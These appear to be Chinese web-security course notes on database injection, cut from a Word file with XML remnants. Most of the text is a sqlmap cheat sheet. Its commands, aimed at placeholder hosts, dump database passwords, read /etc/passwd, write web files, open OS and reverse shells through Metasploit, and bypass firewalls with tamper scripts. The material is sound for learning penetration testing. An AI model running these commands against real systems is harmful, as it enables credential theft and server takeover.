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15 WEB漏洞-Oracle,MongoDB等注入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224780"/>
            <wp:effectExtent l="0" t="0" r="1905" b="444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779395"/>
            <wp:effectExtent l="0" t="0" r="8890" b="1905"/>
            <wp:docPr id="2" name="图片 2" descr="2020122805403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80540386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72865"/>
            <wp:effectExtent l="0" t="0" r="4445" b="3810"/>
            <wp:docPr id="3" name="图片 3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72203183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Access,mysql,mssql,mongoDB,postgresql,sqlite,oracle,sybase等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#补充上课Json注入案例分析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https://tianchi.aliyun.com/competition/entrance/531796/rankingList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#简要学习各种数据库的注入特点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数据库架构组成，数据库高权限操作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#简要学习各种注入工具的使用指南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熟悉工具的支持库，注入模式，优缺点等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Sqlmap，NoSQLAttack,Pangolin等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access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表名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列名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数据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mysql mssql等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数据库名A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表名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列名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数据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数据库名B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。。。。。。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遗留问题：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Access注入时，如果列名或表名猜解不到的情况怎么办?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基本操作笔记：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-u  #注入点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-f  #指纹判别数据库类型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-b  #获取数据库版本信息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-p  #指定可测试的参数(?page=1&amp;id=2 -p "page,id")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-D ""  #指定数据库名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-T ""  #指定表名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-C ""  #指定字段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-s ""  #保存注入过程到一个文件,还可中断，下次恢复在注入(保存：-s "xx.log"　　恢复:-s "xx.log" --resume)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--level=(1-5) #要执行的测试水平等级，默认为1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--risk=(0-3)  #测试执行的风险等级，默认为1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--time-sec=(2,5) #延迟响应，默认为5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--data #通过POST发送数据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--columns        #列出字段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--current-user   #获取当前用户名称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--current-db     #获取当前数据库名称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--users          #列数据库所有用户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--passwords      #数据库用户所有密码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--privileges     #查看用户权限(--privileges -U root)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-U               #指定数据库用户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--dbs            #列出所有数据库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--tables -D ""   #列出指定数据库中的表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--columns -T "user" -D "mysql"#列出mysql数据库中的user表的所有字段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--dump-all            #列出所有数据库所有表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--exclude-sysdbs      #只列出用户自己新建的数据库和表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--dump -T "" -D "" -C ""   #列出指定数据库的表的字段的数据(--dump -T users -D master -C surname)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--dump -T "" -D "" --start 2 --top 4  # 列出指定数据库的表的2-4字段的数据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--dbms    #指定数据库(MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,SQLite,Firebird,Sybase,SAP MaxDB)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--os      #指定系统(Linux,Windows)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-v  #详细的等级(0-6)     0：只显示Python的回溯，错误和关键消息。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1：显示信息和警告消息。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2：显示调试消息。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3：有效载荷注入。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4：显示HTTP请求。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5：显示HTTP响应头。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6：显示HTTP响应页面的内容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--privileges  #查看权限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--is-dba      #是否是数据库管理员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--roles       #枚举数据库用户角色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--udf-inject  #导入用户自定义函数（获取系统权限）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--union-check  #是否支持union 注入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--union-cols #union 查询表记录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--union-test #union 语句测试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--union-use  #采用union 注入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--union-tech orderby #union配合order by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--data "" #POST方式提交数据(--data "page=1&amp;id=2")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--cookie "用;号分开"      #cookie注入(--cookies=”PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low”) --referer ""     #使用referer欺骗(--referer "http://")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--user-agent ""  #自定义user-agent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--proxy "http://127.0.0.1:8118" #代理注入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--string=""    #指定关键词,字符串匹配.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--threads 　　  #采用多线程(--threads 3)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--sql-shell    #执行指定sql命令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--sql-query    #执行指定的sql语句(--sql-query "SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1" 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--file-read    #读取指定文件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--file-write   #写入本地文件(--file-write /test/test.txt --file-dest /var/www/html/1.txt;将本地的test.txt文件写入到目标的1.txt)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--file-dest    #要写入的文件绝对路径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--os-cmd=id    #执行系统命令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--os-shell     #系统交互shell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--os-pwn       #反弹shell(--os-pwn --msf-path=/opt/framework/msf3/)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--msf-path=    #matesploit绝对路径(--msf-path=/opt/framework/msf3/)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--os-smbrelay  #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--os-bof       #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--reg-read     #读取win系统注册表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--priv-esc     #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--time-sec=    #延迟设置 默认--time-sec=5 为5秒 -p "user-agent" --user-agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)"  #指定user-agent注入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--eta          #盲注 /pentest/database/sqlmap/txt/common-columns.txt　　字段字典　　　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common-outputs.txt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common-tables.txt      表字典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keywords.txt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oracle-default-passwords.txt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user-agents.txt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wordlist.txt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常用语句 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1./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -f -b --current-user --current-db --users --passwords --dbs -v 0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2./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --passwords -U root --union-use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3./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --dump -T users -C username -D userdb --start 2 --stop 3 -v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4./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --dump -C "user,pass"  -v 1 --exclude-sysdbs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5./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --sql-shell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6./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --file-read "c:\boot.ini"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7./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --file-write /test/test.txt --file-dest /var/www/html/1.txt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8./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-cmd "id"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9./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-shell --union-use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10./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-pwn --msf-path=/opt/framework/msf3 --priv-esc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11./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-pwn --msf-path=/opt/framework/msf3 -v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12./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-bof --msf-path=/opt/framework/msf3 -v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13./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --reg-add --reg-key="HKEY_LOCAL_NACHINE\SOFEWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1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14./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --eta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15./sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "')" --suffix "AND ('abc'='abc"16./sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass"17./sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"18./sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3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19./sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo'"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20./sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --common-tables -D testdb --banner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21./sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --cookie="PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low" --string='xx' --dbs --level=3 -p "uid"简单的注入流程 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1.读取数据库版本，当前用户，当前数据库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http://www.xxxxx.com/test.php?p=2 -f -b --current-user --current-db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2.判断当前数据库用户权限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http://www.xxxxx.com/test.php?p=2 --privileges -U 用户名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http://www.xxxxx.com/test.php?p=2 --is-dba -U 用户名 -v 1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3.读取所有数据库用户或指定数据库用户的密码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http://www.xxxxx.com/test.php?p=2 --users --passwords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http://www.xxxxx.com/test.php?p=2 --passwords -U root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4.获取所有数据库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http://www.xxxxx.com/test.php?p=2 --dbs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5.获取指定数据库中的所有表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http://www.xxxxx.com/test.php?p=2 --tables -D mysql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6.获取指定数据库名中指定表的字段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http://www.xxxxx.com/test.php?p=2 --columns -D mysql -T users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7.获取指定数据库名中指定表中指定字段的数据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http://www.xxxxx.com/test.php?p=2 --dump -D mysql -T users -C "username,password" -s "sqlnmapdb.log"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8.file-read读取web文件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sqlmap -u http://www.xxxxx.com/test.php?p=2 --file-read "/etc/passwd" -v 2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9.file-write写入文件到web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sqlmap -u http://www.xxxxx.com/test.php?p=2 --file-write /localhost/mm.php --file</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用sqlmap绕过防火墙进行注入测试：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涉及资源：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https://www.cnblogs.com/bmjoker/p/9326258.html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https://github.com/youngyangyang04/NoSQLAttack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https://github.com/sqlmapproject/sqlmap/zipball/master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https://blog.csdn.net/qq_39936434/category_9103379.html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https://www.mozhe.cn/bug/WUJ3OGVQSTIyeXdvbHU2ZmV0MjVDUT09bW96aGUmozhe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1427E"/>
    <w:rsid w:val="3721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2021-03-01T02:46:00Z</dcterms:created>
  <dc:creator>玄泽</dc:creator>
  <cp:lastModifiedBy>玄泽</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-01T02:49:28Z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